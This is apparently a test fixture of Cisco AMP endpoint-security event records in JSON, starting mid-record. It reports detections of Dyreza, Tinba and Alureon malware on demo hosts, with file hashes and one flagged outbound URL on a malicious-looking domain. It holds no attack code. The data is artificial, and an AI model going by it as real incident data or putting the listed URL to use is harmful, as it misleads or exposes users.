Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666793712517000,"timestamp":1610705390,"timestamp_nanoseconds":948000000,"date":"2021-01-15T10:09:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666793712517128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666785122583000,"timestamp":1610705388,"timestamp_nanoseconds":372000000,"date":"2021-01-15T10:09:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666785122582535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":596,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257040021717000,"timestamp":1610705382,"timestamp_nanoseconds":304000000,"date":"2021-01-15T10:09:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257040021717048","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256988482109000,"timestamp":1610705370,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:09:30+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256988482109495","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":782000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203910","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203909","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666694928269000,"timestamp":1610705367,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:09:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666694928269316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":2204,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256962712306000,"timestamp":1610705364,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:09:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256962712305718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617250006073000,"timestamp":1610705347,"timestamp_nanoseconds":296000000,"date":"2021-01-15T10:09:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617250006073346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":706000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053698","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://dak1otavola1ndos.com/h/index.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709511729054000,"timestamp":1610705342,"timestamp_nanoseconds":222000000,"date":"2021-01-15T10:09:02+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826709511729053697","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1083,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"Explorer.EXE","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617228531237000,"timestamp":1610705342,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:09:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617228531236865","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\My Documents\\Downloads\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415396303000800,"timestamp":1610705341,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Variant:Tinba.15hl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705341,"start_date":"2021-01-15T10:09:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"bin.exe","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\Application Data\\default\\bin.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49","sha1":"194ada957926b985653f0400ede75175df6b48be","md5":"c141be7ef8a49c2e8bda5e4a856386ac"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826709507434086000,"timestamp":1610705341,"timestamp_nanoseconds":503000000,"date":"2021-01-15T10:09:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Tinba.15hl.1201","detection_id":"5826709507434086401","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Tinba.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Tinba.exe","identity":{"sha256":"078a122a9401dd47a61369ac769d9e707d9e86bdf7ad91708510b9a4584e8d49"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256842453221000,"timestamp":1610705336,"timestamp_nanoseconds":643000000,"date":"2021-01-15T10:08:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256842453221429","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256790913614000,"timestamp":1610705324,"timestamp_nanoseconds":631000000,"date":"2021-01-15T10:08:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256790913613876","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256739374006000,"timestamp":1610705312,"timestamp_nanoseconds":619000000,"date":"2021-01-15T10:08:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256739374006323","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256687834399000,"timestamp":1610705300,"timestamp_nanoseconds":981000000,"date":"2021-01-15T10:08:20+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256687834398770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256636294791000,"timestamp":1610705288,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:08:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256636294791217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} 